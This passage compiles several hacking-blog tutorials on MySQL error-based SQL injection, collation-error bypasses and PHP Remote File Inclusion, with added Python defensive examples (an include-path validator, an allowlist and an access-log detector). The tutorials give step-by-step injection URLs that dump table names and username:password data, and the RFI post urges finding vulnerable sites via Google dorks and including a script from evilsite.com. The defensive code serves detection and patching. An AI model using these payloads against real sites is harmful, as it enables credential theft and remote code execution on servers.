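Added example, not code from either LFI post. The vulnerable pattern on this
page is include($_GET['page']) with no check at all. The function below
applies an allowlist when one is configured and otherwise canonicalises the
path and requires it to stay inside the web root and to be a .php view, so
the traversal strings from both posts (../../windows/repair/sam, the
poisoned access/error logs) are rejected. The base directory used by
run_cases() is a temporary directory created for the demonstration.
"""
import os
import tempfile


def resolve_include(base_dir, page, allowed=None):
    """Return the absolute path to include, or raise ValueError."""
    if not page or "\x00" in page:
        raise ValueError("empty or NUL-containing page name")
    # PHP on Windows accepts both separators; normalise before any check.
    page = page.replace("\\", "/")
    if allowed is not None:
        # Strongest control: the parameter may only pick from known views.
        if page not in allowed:
            raise ValueError(f"page not in allowlist: {page!r}")
        return os.path.join(os.path.realpath(base_dir), page)
    base = os.path.realpath(base_dir)
    # join() discards base for an absolute page, realpath() collapses ../ and
    # symlinks, so the containment test sees the file that would really open.
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes {base}: {page!r}")
    # Logs and SAM backups are never views; also stops php:// style names,
    # because the returned value is a filesystem path, not the raw parameter.
    if not target.endswith(".php"):
        raise ValueError(f"only .php views may be included: {page!r}")
    return target


def check(base_dir, page, allowed=None):
    """Verdict for one page value: 'allowed' or 'rejected'."""
    try:
        resolve_include(base_dir, page, allowed)
        return "allowed"
    except ValueError:
        return "rejected"


# Constructed probe values, all of which appear in the LFI posts above.
CASES = [
    "contact.php",
    "../",
    "../../windows/repair/sam",
    "../logs/access.log",
    "../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log",
    "/proc/self/environ",
    "php://input",
    "contact.php\x00.jpg",
]


def run_cases(base_dir=None, allowed=None):
    """Map each probe to 'allowed' or 'rejected' for the given web root."""
    base_dir = base_dir or tempfile.mkdtemp(prefix="webroot_")
    return {page: check(base_dir, page, allowed) for page in CASES}


if __name__ == "__main__":
    for page, verdict in run_cases().items():
        print(f"{verdict:8} {page!r}")
```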

Error Based Sql Injection With Exponential Method

Hello guys, in the previous post I covered basic error-based SQL injection, but in this post I will cover error-based SQL injection with the exponential method and mathematical operations. When I looked at the functions in MySQL I was interested in the mathematical functions: they too must use some data type to hold values. So I went on testing for functions which would cause overflow errors, and I found that exp() causes an overflow error when we pass a value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

exp is the opposite of the log functions of MySQL. Briefly, log and ln both return the natural logarithm, i.e. the logarithm to base e. e is commonly approximated as 2.71828.

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

Exponentials are the inverse of logarithms, so the exp function does the exact opposite for us.

Injection :

  • Extracting the database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting table names and column names in one shot.
http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::',column_name) from information_schema.columns where table_schema=database())x))-- -

And we are done: injected using the exponential method.

Thanks for reading guys keep learning 😉

Error Based sql Injection Step by Step

After union-based SQL injection I am going to cover error-based SQL injection. Sometimes while injecting sites we get the number of columns, but the UNION statement gives the error "The used select statement has different number of columns", and then you start brute-forcing columns but that does not work either. Such websites are injected by error-based or double-query injection.

So let's get to work...

  1. First step is to get the version; here is the error-based query to get the version.
www.vuln-web.com/?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 -- -

2. Second step is to enumerate the database of the website: use the above query and replace version() with database(). But there is another syntax used to enumerate the database:

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

If the website has more than one database, they can be enumerated by changing the limit, such as
Limit 0,1
Limit 1,1
Limit 2,1

In this way you can get all the database of the website.

3. Third step is to enumerate the table names and the column names of the target.

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

Using this query you get one table name. To get all the table names, just increase the value of the limit as shown above.

4. Fourth step is to enumerate the columns. Suppose we got the table users; we have to enumerate the columns of the table users.

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Note: replace table_name=0x7573657273 with your desired table name, converted to hex.

5. Fifth step is to dump data from the columns. Suppose the column names we got are username and password; we are going to dump the password column from the table users.

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,0x3a,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Here 0x3a is the hex value of ':'. It acts as a separator between username and password, so the result looks like this:
username : password
If we don't use this separator we cannot tell where one value ends and the next begins; the result would look like this:
usernamepassword

Here,
users = table name
username = first column
password = second column

Replace this with your desired table name and column name.

Thanks for reading guys, keep practising and learning 🙂

Remote File Inclusion RFI Attack

In this session you will learn how to exploit a remote file inclusion (RFI) vulnerability. So, let's start with the basic concepts and an introduction.

What Is Remote File Inclusion ?

RFI stands for Remote File Inclusion: a vulnerability that allows the attacker to upload a custom coded/malicious file to a website or server using a script. It exploits poor validation checks in websites and can eventually lead to code execution on the server or code execution on the website (XSS attack using JavaScript) *client sided shiZ*.

RFI is a common vulnerability and, trust me, website hacking is not all about SQL injection. Using RFI you can literally deface *if that's what you're looking for 😐* websites, get access to the server and do almost anything. What makes it more dangerous is that you only need common sense and basic knowledge of PHP to execute this one; some BASH might come in handy as most servers today are hosted on Linux.


Starting with RFI

Let's get started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you can't find one, don't worry, you'll still learn 😀 – just upload this to any site and save it as index.php in a folder called rfi.

<?php
# Infoseczone's RFI Tutorial @ infoseczone
$file = $_GET['file'] ?? null;                       # untrusted value taken straight from the query string
if ($file != null){include($file.".html");}         # whatever the user supplied, plus ".html", goes to include()
?>

and save this as tut.html

<html>
<body>
<center><h1>RFI</h1></center>
</body>
</html>

then visit http://yoursite.com/rfi/index.php?file=tut

As you can see, this code (index.php) takes the document name from the file parameter, appends .html and “includes” it.
If this isn't coded properly, the script doesn't check where the file is coming from, so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let's try it out.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt
Warning: include(http://evilsite.com/evilscript.txt.html): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4

Just like the %00 that gets rid of the .html part in LFI, in RFI you have the “?” sign. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.html, because the ? sign turns the appended .html into a GET argument, which does not affect which file is requested from the remote server.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?

Patching Remote File Inclusion Vulnerability

Method One (Switch Statement)

<?php
$file = $_GET['file'] ?? null;
switch($file){          # only the fixed file names below ever reach include(); the parameter value itself never does
        case "about":
        include("aboutus.html");
        break;
        case "contact":
        include("contactus.html");
        break;
        default: # If parameter != contact or about
        include("tut.html");
        break;}
?>

Method Two (If Statement)

<?php
$file = $_GET['file'] ?? null;
if (isset($file))
{
    if ($file == "about")
    {
        include("aboutus.html");
    }
    elseif ($file == "contact")
    {
        include("contactus.html");
    }
    else    # anything else, including a remote URL, falls back to the default page
    {
        include("tut.html");
    }
}
?>
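The same allow-list approach as the two patches above, written here as an added example in Python (not the post's own code) so the check can be unit-tested; it also classifies why a value was rejected so the rejection can be logged. Page names about/contact/tut come from the post; the function names and reason strings are assumptions.

```python
from urllib.parse import urlsplit

# Only these names may ever reach include(); the parameter value itself never does.
ALLOWED_PAGES = {
    "about": "aboutus.html",
    "contact": "contactus.html",
    "tut": "tut.html",
}
DEFAULT_PAGE = "tut.html"   # same fallback the switch patch uses

def classify_file_param(value):
    """Return a short reason if the value looks like an inclusion attempt, else None.
    The reason is meant for logging/alerting; the allow-list alone already blocks it."""
    if value is None:
        return None
    if "\x00" in value or "%00" in value:
        return "null-byte truncation"        # the %00 trick used against the appended '.html' in LFI
    if urlsplit(value).scheme:               # http://, https://, ftp://, PHP stream wrappers, ...
        return "remote or wrapper URL"       # what include() would fetch in the RFI case
    if "?" in value:
        return "query-string suffix trick"   # the trailing '?' that neutralises the appended '.html'
    if ".." in value or value.startswith(("/", "\\")):
        return "path traversal"
    return None

def resolve_include(value):
    """Map the user-controlled 'file' parameter to a page the server may include.
    Returns (path, reason): path always comes from the allow-list; reason is None
    for a legitimate request and a string describing why the value was rejected."""
    if value is None:                        # parameter absent: plain default page, nothing to log
        return DEFAULT_PAGE, None
    reason = classify_file_param(value)
    if reason is None and value in ALLOWED_PAGES:
        return ALLOWED_PAGES[value], None
    return DEFAULT_PAGE, reason or "not in allow-list"
```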

Thanks for reading, keep learning some good stuff 😀

Bypass illegal mix of collations in sql injection

In this post you will learn how to bypass the error “illegal mix of collations” in SQL injection.

What is an illegal mix of collations ?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted by SQL Server. Because many people use MySQL to store data in languages other than English, they need to select the comparison rules, which in turn depend on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defined at different levels, i.e. the server, the database, the table and the column level.

With UNION SELECT we combine the result sets of two or more SELECT statements. We already know that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. And they must have the same collation !! If they differ, we get the error.

Bypassing Error

# Method 1

Specify COLLATE explicitly:
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation: character comparisons are based on the characters' binary code values.

# Method 2

Use the function CONVERT.
CONVERT() provides a way to convert data between different character sets. The syntax is: CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use function CAST

You can also use CAST() to convert a string to a different character set. The syntax is: CAST(character_string AS character_data_type CHARACTER SET charset_name).

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--

# Method 4

Use the function pair UNHEX(HEX(xx))
HEX() –> returns a hexadecimal string representation of a number or string value
UNHEX() –> the inverse of HEX(): interprets each pair of hex digits as a character and returns the resulting binary string

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--
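Added here as an example that is not part of the original posts: a small Python detector that scans web-server access-log lines for the MySQL error-based fragments (FLOOR(RAND(0)*2) with GROUP BY, INFORMATION_SCHEMA) from the enumeration section earlier on this page and for the collation-bypass functions (CONVERT/CAST to binary, UNHEX(HEX())) from this section, so it serves both passages. The log lines, addresses, timestamps and signature names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Fragments from both sections, matched case-insensitively against decoded parameter values.
SIGNATURES = {
    "error-based duplicate-key (FLOOR(RAND(0)*2) with GROUP BY)":
        re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by"
                   r"|group\s+by.*floor\s*\(\s*rand", re.I | re.S),
    "schema enumeration (INFORMATION_SCHEMA)":
        re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    "collation bypass (CONVERT/CAST to binary, UNHEX(HEX()))":
        re.compile(r"convert\s*\(.*using\s+binary|cast\s*\(.*as\s+binary|unhex\s*\(\s*hex\s*\(",
                   re.I | re.S),
    "trailing comment terminator (-- or -- -)":
        re.compile(r"--\s*-?\s*$"),
}

# Common Log Format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (addresses, times and paths invented for this example); the
# second and third requests carry payloads of the shape shown on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /?id=1%27+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1+--+- HTTP/1.1" 500 1043',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /?id=1+and+0+UNION+SELECT+1,UNHEX(HEX(version())),3,4,5,6,7,8-- HTTP/1.1" 200 2210',
    '198.51.100.9 - - [10/Oct/2023:13:56:30 +0000] "GET /page.asp?id=1&lang=en HTTP/1.1" 200 512',
]

def scan_line(line):
    """Return (ip, path, [matched signature names]), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    # parse_qsl percent-decodes and turns '+' into spaces, so the signatures see the SQL as the
    # database would; values are joined so a payload split across parameters is still one string
    decoded = " ".join(v for _, v in parse_qsl(query, keep_blank_values=True))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return m.group("ip"), m.group("path"), hits

def scan_log(lines):
    """Yield only the parsed entries that matched at least one signature."""
    for line in lines:
        entry = scan_line(line)
        if entry and entry[2]:
            yield entry
```

The matched signature names are intended as alert reasons; the status code (500 on the error-based request) is a useful second signal, since that technique relies on the server surfacing a database error.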

Hope this helps you with the illegal mix of collations error. Keep learning and practising.

Thanks for reading guys. 🙂